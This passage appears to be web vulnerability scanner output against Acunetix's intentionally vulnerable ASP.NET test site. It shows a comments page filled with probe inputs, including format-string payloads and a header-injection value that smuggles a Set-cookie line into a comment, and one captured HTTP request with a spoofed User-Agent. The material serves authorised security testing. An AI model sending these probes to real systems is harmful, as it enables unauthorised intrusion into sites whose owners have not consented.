class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:10 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">ZAP</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">ZAP %1!s%2!s%3!s%4!s%5!s%6!s%7!s%8!s%9!s%10!s%11!s%12!s%13!s%14!s%15!s%16!s%17!s%18!s%19!s%20!s%21!n%22!n%23!n%24!n%25!n%26!n%27!n%28!n%29!n%30!n%31!n%32!n%33!n%34!n%35!n%36!n%37!n%38!n%39!n%40!n </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:34 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:06 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:37 AM</DIV><DIV class="CommentText">\|</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:37 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:38 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any? Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any? Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7 </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">any? Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7 </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:22 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:35 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:35 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:38 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA">hvEYyWNN</textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=0
Method	POST
Parameter	Header User-Agent
Attack	msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Show / hide Request and Response
Request Header - size: 559 bytes.	POST http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: msnbot/1.1 (+http://search.msn.com/msnbot.htm) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1381 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,381 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk%2FTUy&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQKDytHbBQKAgcfvBQKFzrr8AQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBDelgcSNkQi9b3oGhQR0IdatoEdv&tbComment=hvEYyWNN&btnSend=Send+comment
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:08 GMT Content-Length: 53582
Response Body - size: 53,582 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1"> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFgoCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkAgkPZBYCAgEPZBbUA2YPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAIBD2QWAmYPFgIeBWNsYXNzBQdDb21tZW50ZAICD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAIDD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCBA9kFgJmDxYCHwMFB0NvbW1lbnRkAgUPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAgYPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAIHD2QWAmYPFgIfAwUHQ29tbWVudGQCCA9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCCQ9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAgoPZBYCZg8WAh8DBQdDb21tZW50ZAILD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAIMD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCDQ9kFgJmDxYCHwMFB0NvbW1lbnRkAg4PZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAg8PZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAIQD2QWAmYPFgIfAwUHQ29tbWVudGQCEQ9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFn